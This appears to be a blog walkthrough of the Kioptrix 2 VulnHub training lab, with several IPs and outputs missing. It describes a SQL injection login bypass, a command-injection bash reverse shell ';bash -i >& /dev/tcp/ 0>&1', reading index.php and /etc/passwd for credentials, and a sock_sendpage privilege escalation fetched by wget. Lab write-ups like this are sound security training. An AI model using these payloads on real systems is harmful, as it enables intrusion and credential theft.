Kioptrix 2 Walkthrough

Kioptrix 2 VulnHub Walkthrough

I started this box with a netdiscover scan It found that it was ip

netdiscover -r

Discovered some open ports

SSH info

Apache webserver with version and OS info

Some info over https

Looks like this sites running php

We also have a cups server

And a mysql server that our IP isn’t permitted to connect to:

OS and kernel info

First thing I attempted to enum was the webserver. I browsed to to find a login page.

tried to most basic ” ‘ or 1=1– ” for both username and password, and it logined me in successfully!

The prompt asked for a machine to ping, so let’s give it a try:

I tried to inject some code in the text box by trying a couple different syntax commands from various languages.

It seems like the box is running a bash script. Since “;” allowed for additional commands to be included in the user input variable, let see if we can get a reverse shell.

I issued a bash command to connect back to my machine 🙂

;bash -i >& /dev/tcp/ 0>&1

After checking my present dir and looking at some of the files, I found a username and password in the index.php file

I also issed a cat /etc/passwd and found the user john on the sytem

I tried the mysql db first and was able to login

I looked through the databases and found a couple username and passwords

The admin password logged me into the web app just like the SQLi, but the john user just presented me with a blank screen. I tried these passwords in combination with john/admin/root over ssh, but no luck

I decided I needed some help, so I wanted to download linux exploit suggestor. I issued a command to find world writeable directories

/var/tmp looks like a good choice. I cd’d to that dir and downloaded

It found a number of potential vulnerabilities

I tried a half_nelson exploit with no success, but on a second try, was successful with the sock_sendpage vuln. I downloaded the vuln to my kali machine, then issued a wget from the vuln vm

I chmod’d the file and ran it, now we have root!

Leave a Reply

Your email address will not be published.